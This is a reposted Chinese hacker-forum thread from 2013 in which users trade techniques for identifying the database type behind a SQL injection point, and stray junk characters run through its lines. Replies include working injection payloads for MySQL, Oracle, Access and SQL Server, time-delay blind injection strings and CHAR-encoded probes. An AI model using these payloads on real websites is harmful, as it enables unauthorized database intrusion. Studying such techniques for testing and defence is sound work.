找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2124|回复: 0
打印 上一主题 下一主题

一个注射点如何最快速确认是什么类型数据库

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-11 09:54:04 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
一个注射点如何最快速确认是什么类型数据库8 N' z- t" X  H8 i. Q, B& t, Z
xsser (十根阳具有长短!!) | 2013-02-05 12:36
6 G9 @; {4 f0 G- d( [" t3 P+ z  R, b假设这么一个注射点:
1 H$ x, E" f7 o$ b3 {* vshow.html?id=2
% X+ x9 D( Q. y3 }  j5 W* `3 Smysql:id=2 and version()>0; h8 X) P6 [. ?% T7 F; V  h( i
oracle:id=2 and '1'||'1'='112 z* |3 u, K& B: X0 I
其他的欢迎补充/ Z# r5 T4 ^& D: s
1#
' [  v  X# d, L/ z* p8 w; hupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 12:47, @/ g8 x8 D6 `1 g% j
Access:6 j( v7 V/ J; ?; ^( X6 [8 T  }
aNd aSc(cHr(97))=97- ^- o) F! ?3 s/ O% U
and exists(select id from MSysAccessObjects)
$ K' r& a; ?5 \SQL Server:  A; V6 k" V! }* ]- k
and exists(select id from sysobjects)
3 U- V$ e7 T! V& zand length(user)>0
; E* \+ ~- X8 p4 s- BMySQL:
2 }/ y: X; M) N( Iand length(user())>0! S8 u7 U+ S# t- s! y% ^
2#
  }+ v1 M+ _- n" B* h0 p5 kxsser (十根阳具有长短!!) | 2013-02-05 12:48
  V) ?6 t& ^3 |; y! Y- z: U@upload 如果这些都不是呢…& M# i7 N3 Z9 ^) K
3#& g/ a" n; C" g) C
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:03
2 m+ A2 w3 n4 a- d3 P; G( ?! W@xsser 不快速的,延时注入& |7 ?# a& i8 c$ z" t
不知道这样写对不对
, c: {  f$ }2 b+ L! tmssql:id=2 and IF(ascii(SUBSTRING('name',1,1))>0)waitfor delay'0:00:3'2 v6 B9 y" V4 N. ?' K$ V/ X
mysql:id=2 and select benchmark(1e8,current_date());2 x7 l% W9 j( x. R7 R9 l
4#
  S; q3 p1 ]: x1 J7 k  `upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:10
1 ^/ s( d: L- B6 z, s0 M最快的貌似是看报错信息/ w7 n7 p7 k0 m
oracle error
- {/ ^  Y" F$ U2 kmssql error. D- S0 d- Q, R  t' |
mysql error
+ D9 I, |- `, s7 L1 J% \1 ^% T  F5#
' E5 Q; N$ a4 g% LNimda (你们都是坏银~) | 2013-02-05 13:14
% m- U0 x+ `- w0 B% [. K2 X6 n& K3 _小菜献丑来一发 Oracle:id=2 and 0<>(select count(*) from dual)# n/ G3 I( l: H3 w
6#
/ W3 S; n8 }% B" ~7 w3 S3 Y. Bupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:21) z* P  ~% ^. ]1 n. I
“/*”是MySQL中的注释符,返回错误说明该注入点不是MySQL,继续提交如下查询字符:, A+ A* I$ [2 y1 }9 c
“–”是Oracle和MSSQL支持的注释符,如果返回正常,则说明为这两种数据库类型之一。继续提交如下查询字符:! z6 Z' {4 c, a3 B. e* w1 \9 X
“;”是子句查询标识符,Oracle不支持多行查询,因此如果返回错误,则说明很可能是Oracle数据库。, p- I- Q  P" q& X
7#
. m/ W; x: [5 w8 D) R5 M5 b_Evil (HackEnd) | 2013-02-05 13:33
3 n  q8 Q6 p# i" w, c4 F" y9 FPostgreSQL% f$ T4 X, w+ C
8#
+ P9 {  ~$ B$ {upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:42/ M  ^+ m( R* J" n2 Y# \
切换编码 and 1=1" e2 C- d$ X9 P
oracle:
" ?% I- W9 m/ W8 @$ j" l& X. @- B! hCHR(97) || CHR(110) || CHR(100) || CHR(32) || CHR(49) || CHR(61) || CHR(49)
) o: z) G- M4 w+ {8 E2 Wmssql:; T( p1 J$ I8 R7 ]
CHAR(97) + CHAR(110) + CHAR(100) + CHAR(32) + CHAR(49) + CHAR(61) + CHAR(49)* ?% G( ]2 x8 \" ^1 Y: }
mysql:9 f$ o. K: @; l4 S/ q
CHAR(97, 110, 100, 32, 49, 61, 49)" j* U3 k$ b$ z4 X' X
9#, [  @, r" R, f* D0 X. i0 u
xsser (十根阳具有长短!!) | 2013-02-05 14:31
9 q: T& @( W- X* P6 A@upload 比较常见的数据库这些还是可以判断的,但是还有其他奇葩类型的呢?9 B, ]; a. A2 H; T7 t3 N; p
10#
+ o: Q9 B0 v% J, U( M9 v. p) O  ~upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 14:46
' @' r" c- a* i* H@xsser 是奇葩数据库类型的么?
) h1 t" f7 S( ]: q. h& k根据注入的原理,我们可以猜想,要成功的注入,必须使得注入后的一片和谐,那么使用该类数据库特性来判断,综上所述:
8 Q$ S5 O& H& {4 g1.是否可以使用特定的函数来判断,该数据库特有的
: k  ~1 a4 L- p8 z" p2.是否可以使用辅助的符号来判断,如注释符号、多语句查询符等等( Y+ j3 Z2 Q# X" \+ T9 t! U
3.是否可以编码查询
4 g  }- \7 ]0 m7 q4.是否显可以利用错信息$ H) q# k. E" I2 E5 j
5.是否存在数据库某些特性辅助判断
% M. W. w# L! w* O0 Q& S个人见解) C' k6 j. l3 g3 P
11#0 {- Q& C9 p: E8 L: S2 \5 O
小胖子 (z7y壮士,来,干了这碗酒!) | 2013-02-05 14:55
- \( u/ y; L( y( f+ h& j( R已收藏,mssql可以直接看到错误提示的吧~; w: L( k+ g9 R  |0 x( q- C
12#
, q& Z( @, c5 j4 N  W) A. Z2 t+ oPasser_by | 2013-02-05 15:09
  F( Q+ \) I( s& f' }) n曾被 @GaRY 面过我这题。。。紧张了。。后来回家sqlmap判断注射点的时候抓包看了下。。。一抓包全出来了居然。。( G5 I, R( C4 g* u; A! Z5 S" r! _
from:http://zone.wooyun.org/content/260
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表